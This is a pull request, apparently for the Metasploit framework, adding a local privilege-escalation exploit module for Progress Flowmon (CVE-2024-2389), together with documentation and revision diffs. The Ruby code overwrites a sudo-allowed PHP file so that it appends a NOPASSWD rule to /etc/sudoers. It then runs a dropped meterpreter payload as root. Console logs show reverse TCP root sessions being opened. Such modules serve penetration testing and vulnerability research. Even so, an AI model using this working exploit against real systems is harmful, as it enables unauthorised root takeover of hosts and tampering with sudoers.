### PR TITLE
Add local privesc module for Flowmon

### DIFF
--- a/documentation/modules/exploit/linux/local/progress_flowmon_sudo_privesc_2024.md
+++ b/documentation/modules/exploit/linux/local/progress_flowmon_sudo_privesc_2024.md
@@ -1,0 +1,94 @@
+## Vulnerable Application
+Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the
+`flowmon` user to `root`. This is possible due to the
+flowmon user being able to run several commands with
+`sudo`. This module exploits the ability to overwrite a
+PHP file and execute it with `sudo` granting full `sudo`
+permissions to the `flowmon` user and elevating the
+shell to a root shell.
+
+For more details on the vulnerability:
+https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ (privesc methods)
+
+https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
+
+This application is avaiable in cloud marketplaces:
+- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
+- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
+- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
+
+
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Gain a session on a Progress Kemp Loadmaster target as the `flowmon` user
+1. Do: `use exploits/linux/local/pprogress_flowmon_sudo_privesc_2024`
+1. Do: `set SESSION <session>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `root` user.
+
+## Scenarios
+
+### Flowmon 12.2
+
+```msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                          Connection
+  --  ----  ----                   -----------                          ----------
+  2         meterpreter x64/linux  flowmon @ flowmon.my3m4o21xjze5fomt  138.111.211.11:4444 -> 172.174.209.1
+                                   xp5e53h2h.bx.internal.cloudapp.net   01:50756 (10.1.0.4)
+
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > show options
+
+Module options (exploit/linux/local/progress_flowmon_sudo_privesc):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   SESSION       2                yes       The session to run this module on
+   TEMP_PAYLOAD  /tmp/sCmGZ       yes       The temporary name to use to store the payload.
+
+
+Payload options (linux/x64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  138.111.211.11   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run
+
+[*] Started reverse TCP handler on 138.111.211.11:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Copying /var/www/shtml/index.php to /tmp/index.php.bak
+[*] Overwriting /var/www/shtml/index.php with payload
+[*] Executing sudo to elevate privileges
+[*] Replacing index.php with original file
+[+] Deleted /tmp/sCmGZ
+[*] Meterpreter session 3 opened (138.111.211.11:4444 -> 172.174.209.101:51042) at 2024-05-01 15:41:10 +0000
+
+meterpreter > sysinfo
+Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+```

--- a/documentation/modules/exploit/linux/local/progress_flowmon_sudo_privesc_2024.md
+++ b/documentation/modules/exploit/linux/local/progress_flowmon_sudo_privesc_2024.md
@@ -30,32 +30,32 @@ This application is avaiable in cloud marketplaces:
 
 ### Flowmon 12.2
 
-```msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > sessions
+```
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > sessions -l
 
 Active sessions
 ===============
 
-  Id  Name  Type                   Information                          Connection
-  --  ----  ----                   -----------                          ----------
-  2         meterpreter x64/linux  flowmon @ flowmon.my3m4o21xjze5fomt  138.111.211.11:4444 -> 172.174.209.1
-                                   xp5e53h2h.bx.internal.cloudapp.net   01:50756 (10.1.0.4)
+  Id  Name  Type                   Information                                  Connection
+  --  ----  ----                   -----------                                  ----------
+  5         meterpreter x64/linux  flowmon @ localhost.localdomain.localdomain  192.168.2.23:4444 -> 192.168.2.26:38328 (192.168.2.26)
 
-msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > show options
+msf6 exploit(linux/local/progress_flowmon_sudo_privesc_2024) > show options
 
-Module options (exploit/linux/local/progress_flowmon_sudo_privesc):
+Module options (exploit/linux/local/progress_flowmon_sudo_privesc_2024):
 
    Name          Current Setting  Required  Description
    ----          ---------------  --------  -----------
-   SESSION       2                yes       The session to run this module on
-   TEMP_PAYLOAD  /tmp/sCmGZ       yes       The temporary name to use to store the payload.
+   SESSION       -1               yes       The session to run this module on
+   WRITABLE_DIR  /tmp             yes       A directory where we can write files
 
 
-Payload options (linux/x64/meterpreter_reverse_tcp):
+Payload options (linux/x64/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  138.111.211.11   yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
+   LHOST  192.168.2.23     yes       The listen address (an interface may be specified)
+   LPORT  5555             yes       The listen port
 
 
 Exploit target:
@@ -70,22 +70,27 @@ View the full module info with the info, or info -d command.
 
 msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run
 
-[*] Started reverse TCP handler on 138.111.211.11:4444
+[*] Started reverse TCP handler on 192.168.2.23:5555
 [*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 2 indicators this is a Progress Flowmon product
 [!] The service is running, but could not be validated.
-[*] Copying /var/www/shtml/index.php to /tmp/index.php.bak
+[*] Saving payload as /tmp/.fovaiiazfuhl
 [*] Overwriting /var/www/shtml/index.php with payload
 [*] Executing sudo to elevate privileges
-[*] Replacing index.php with original file
-[+] Deleted /tmp/sCmGZ
-[*] Meterpreter session 3 opened (138.111.211.11:4444 -> 172.174.209.101:51042) at 2024-05-01 15:41:10 +0000
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.2.26
+[+] Deleted /tmp/.fovaiiazfuhl
+[*] Cleaning up addition to /etc/sudoers
+[*] Meterpreter session 9 opened (192.168.2.23:5555 -> 192.168.2.26:33408) at 2024-05-23 16:46:10 -0400
+[*] Restoring /var/www/shtml/index.php file contents...
 
+meterpreter > getuid
+Server username: root
 meterpreter > sysinfo
-Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
-OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
+Computer     : localhost.localdomain.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.flowmon.x86_64)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter > getuid
-Server username: root
+meterpreter >
 ```

--- a/documentation/modules/exploit/linux/local/progress_flowmon_sudo_privesc_2024.md
+++ b/documentation/modules/exploit/linux/local/progress_flowmon_sudo_privesc_2024.md
@@ -16,9 +16,6 @@ This application is avaiable in cloud marketplaces:
 - https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
 - https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
 - https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud
-
-
-
 ## Verification Steps
 1. Install the application
 1. Start msfconsole

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -43,9 +43,6 @@ class MetasploitModule < Msf::Exploit::Local
         'Arch' => [ARCH_X86, ARCH_X64],
         'Targets' => [['Automatic', {}]],
         'Privileged' => true,
-        'DefaultOptions' => {
-          'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
-        }
       )
     )
     register_options([

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -71,7 +71,17 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
+  def cleanup
+    super
+    unless @index_php_contents.blank?
+      print_status('Restoring /var/www/shtml/index.php file contents...')
+      file_rm('/var/www/shtml/index.php')
+      write_file('/var/www/shtml/index.php', @index_php_contents)
+    end
+  end
+
   def exploit
+    @index_php_contents = ''
     fail_with(Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable") unless writable?(datastore['WRITABLE_DIR'])
     exploit_file = "#{datastore['WRITABLE_DIR']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
 
@@ -79,17 +89,11 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(exploit_file, generate_payload_exe)
     chmod(exploit_file)
     register_file_for_cleanup(exploit_file)
-    index_php_contents = read_file('/var/www/shtml/index.php')
+    @index_php_contents = read_file('/var/www/shtml/index.php')
     print_status('Overwriting /var/www/shtml/index.php with payload')
     cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
     print_status('Executing sudo to elevate privileges')
     cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
     cmd_exec("sudo '#{exploit_file}'")
-
-    print_status('Restoring /var/www/shtml/index.php file contents...')
-    file_rm('/var/www/shtml/index.php')
-    write_file('/var/www/shtml/index.php', index_php_contents)
-  ensure
-    cleanup
   end
 end

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -1,0 +1,87 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Progress Flowmon Local sudo privilege escalation',
+        'Description' => %q{
+          This module abuses a feature of the sudo command on Progress Flowmon.
+          Certain binary files are allowed to automatically elevate
+          with the sudo command.  This is based off of the file name.  This
+          includes executing a PHP command with a specific file name. If the
+          file is overwritten with PHP code it can be used to elevate privileges
+          to root.
+        },
+        'Author' => [
+          'Dave Yesland with Rhino Security Labs',
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],
+          ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
+        ],
+        'DisclosureDate' => '2024-03-19',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' => [['Automatic', {}]],
+        'Privileged' => true,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+        }
+      )
+    )
+    register_options([
+      OptString.new('TEMP_PAYLOAD', [true, 'The temporary name to use to store the payload.', '/tmp/' + Rex::Text.rand_text_alpha(5..9) ])
+    ])
+  end
+
+  def check
+    score = 0
+    score += 1 if read_file('/var/www/shtml/index.php').include?('FlowMon')
+    score += 1 if read_file('/var/www/shtml/ui/manifest.json').include?('Flowmon Web Interface')
+    score += 1 if exists?('/var/www/shtml/translate.php')
+    vprint_status("Found #{score} indicators this is a Progress Flowmon product")
+    return CheckCode::Detected if score > 0
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    if exists?(datastore['TEMP_PAYLOAD'])
+      fail_with(Msf::Module::Failure::BadConfig, "#{datastore['TEMP_PAYLOAD']} exists on host; chose another name.")
+    end
+
+    vprint_status("Saving payload as #{datastore['TEMP_PAYLOAD']}")
+    write_file(datastore['TEMP_PAYLOAD'], generate_payload_exe)
+    chmod(datastore['TEMP_PAYLOAD'])
+    register_file_for_cleanup(datastore['TEMP_PAYLOAD'])
+
+    print_status('Copying /var/www/shtml/index.php to /tmp/index.php.bak')
+    cmd_exec('cp /var/www/shtml/index.php /tmp/index.php.bak')
+    print_status('Overwriting /var/www/shtml/index.php with payload')
+    cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
+    print_status('Executing sudo to elevate privileges')
+    cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
+    print_status('Replacing index.php with original file')
+    cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php')
+    cmd_exec("sudo #{datastore['TEMP_PAYLOAD']}")
+  end
+end

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     score = 0
     score += 1 if read_file('/var/www/shtml/index.php')&.include?('FlowMon')
-    score += 1 if read_file('/var/www/shtml/ui/manifest.json').include?('Flowmon Web Interface')
+    score += 1 if read_file('/var/www/shtml/ui/manifest.json')&.include?('Flowmon Web Interface')
     score += 1 if exists?('/var/www/shtml/translate.php')
     vprint_status("Found #{score} indicators this is a Progress Flowmon product")
     return CheckCode::Detected if score > 0

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local
           with the sudo command.  This is based off of the file name.  This
           includes executing a PHP command with a specific file name. If the
           file is overwritten with PHP code it can be used to elevate privileges
-          to root.
+          to root. Progress Flowmon up to at least version 12.3.5 is vulnerable.
         },
         'Author' => [
           'Dave Yesland with Rhino Security Labs',

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_X86, ARCH_X64],
         'Targets' => [['Automatic', {}]],
-        'Privileged' => true,
+        'Privileged' => true
       )
     )
     register_options([
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status('Replacing index.php with original file')
     cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php')
     cmd_exec("sudo '#{datastore['TEMP_PAYLOAD']}'")
-  ensure 
+  ensure
     cleanup
   end
 end

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options([
-      OptString.new('TEMP_PAYLOAD', [true, 'The temporary name to use to store the payload.', '/tmp/' + Rex::Text.rand_text_alpha(5..9) ])
+      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
     ])
   end
 
@@ -61,25 +61,34 @@ class MetasploitModule < Msf::Exploit::Local
     return CheckCode::Safe
   end
 
-  def exploit
-    if exists?(datastore['TEMP_PAYLOAD'])
-      fail_with(Msf::Module::Failure::BadConfig, "#{datastore['TEMP_PAYLOAD']} exists on host; chose another name.")
+  def on_new_session(session)
+    super
+    print_status('Cleaning up addition to /etc/sudoers')
+    if session.type.to_s.eql? 'meterpreter'
+      session.sys.process.execute '/bin/sh', "-c \"sed -i '/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d' /etc/sudoers\""
+    elsif session.type.to_s.eql? 'shell'
+      session.shell_command_token 'sed -i \'/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d\' /etc/sudoers'
     end
+  end
 
-    vprint_status("Saving payload as #{datastore['TEMP_PAYLOAD']}")
-    write_file(datastore['TEMP_PAYLOAD'], generate_payload_exe)
-    chmod(datastore['TEMP_PAYLOAD'])
-    register_file_for_cleanup(datastore['TEMP_PAYLOAD'])
+  def exploit
+    fail_with(Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable") unless writable?(datastore['WRITABLE_DIR'])
+    exploit_file = "#{datastore['WRITABLE_DIR']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
 
-    print_status('Copying /var/www/shtml/index.php to /tmp/index.php.bak')
-    cmd_exec('cp /var/www/shtml/index.php /tmp/index.php.bak')
+    vprint_status("Saving payload as #{exploit_file}")
+    write_file(exploit_file, generate_payload_exe)
+    chmod(exploit_file)
+    register_file_for_cleanup(exploit_file)
+    index_php_contents = read_file('/var/www/shtml/index.php')
     print_status('Overwriting /var/www/shtml/index.php with payload')
     cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
     print_status('Executing sudo to elevate privileges')
     cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
-    print_status('Replacing index.php with original file')
-    cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php')
-    cmd_exec("sudo '#{datastore['TEMP_PAYLOAD']}'")
+    cmd_exec("sudo '#{exploit_file}'")
+
+    print_status('Restoring /var/www/shtml/index.php file contents...')
+    file_rm('/var/www/shtml/index.php')
+    write_file('/var/www/shtml/index.php', index_php_contents)
   ensure
     cleanup
   end

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -83,5 +83,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status('Replacing index.php with original file')
     cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php')
     cmd_exec("sudo #{datastore['TEMP_PAYLOAD']}")
+  ensure 
+    cleanup
   end
 end

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     score = 0
-    score += 1 if read_file('/var/www/shtml/index.php').include?('FlowMon')
+    score += 1 if read_file('/var/www/shtml/index.php')&.include?('FlowMon')
     score += 1 if read_file('/var/www/shtml/ui/manifest.json').include?('Flowmon Web Interface')
     score += 1 if exists?('/var/www/shtml/translate.php')
     vprint_status("Found #{score} indicators this is a Progress Flowmon product")

--- a/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
+++ b/modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
     print_status('Replacing index.php with original file')
     cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php')
-    cmd_exec("sudo #{datastore['TEMP_PAYLOAD']}")
+    cmd_exec("sudo '#{datastore['TEMP_PAYLOAD']}'")
   ensure 
     cleanup
   end


### PR DESCRIPTION
This adds a local privesc exploit module which abuses the sudoers permissions for the Flowmon user to elevate to root.

## Vulnerable Application
Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the
`flowmon` user to `root`. This is possible due to the
flowmon user being able to run several commands with
`sudo`. This module exploits the ability to overwrite a
PHP file and execute it with `sudo` granting full `sudo`
permissions to the `flowmon` user and elevating the
shell to a root shell.

For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ (privesc methods)

https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability

This application is available in cloud marketplaces:
- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud



## Verification Steps
1. Install the application
1. Start msfconsole
1. Gain a session on a Progress Kemp Loadmaster target as the `flowmon` user
1. Do: `use exploits/linux/local/pprogress_flowmon_sudo_privesc_2024`
1. Do: `set SESSION <session>`
1. Do: `set LHOST <your host IP>`
1. Do: `run`
1. You should get a shell as the `root` user.

## Scenarios

### Flowmon 12.2

```msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > sessions

Active sessions
===============

  Id  Name  Type                   Information                          Connection
  --  ----  ----                   -----------                          ----------
  2         meterpreter x64/linux  flowmon @ flowmon.my3m4o21xjze5fomt  138.111.211.11:4444 -> 172.174.209.1
                                   xp5e53h2h.bx.internal.cloudapp.net   01:50756 (10.1.0.4)

msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > show options

Module options (exploit/linux/local/progress_flowmon_sudo_privesc):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   SESSION       2                yes       The session to run this module on
   TEMP_PAYLOAD  /tmp/sCmGZ       yes       The temporary name to use to store the payload.


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  138.111.211.11   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run

[*] Started reverse TCP handler on 138.111.211.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Copying /var/www/shtml/index.php to /tmp/index.php.bak
[*] Overwriting /var/www/shtml/index.php with payload
[*] Executing sudo to elevate privileges
[*] Replacing index.php with original file
[+] Deleted /tmp/sCmGZ
[*] Meterpreter session 3 opened (138.111.211.11:4444 -> 172.174.209.101:51042) at 2024-05-01 15:41:10 +0000

meterpreter > sysinfo
Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```
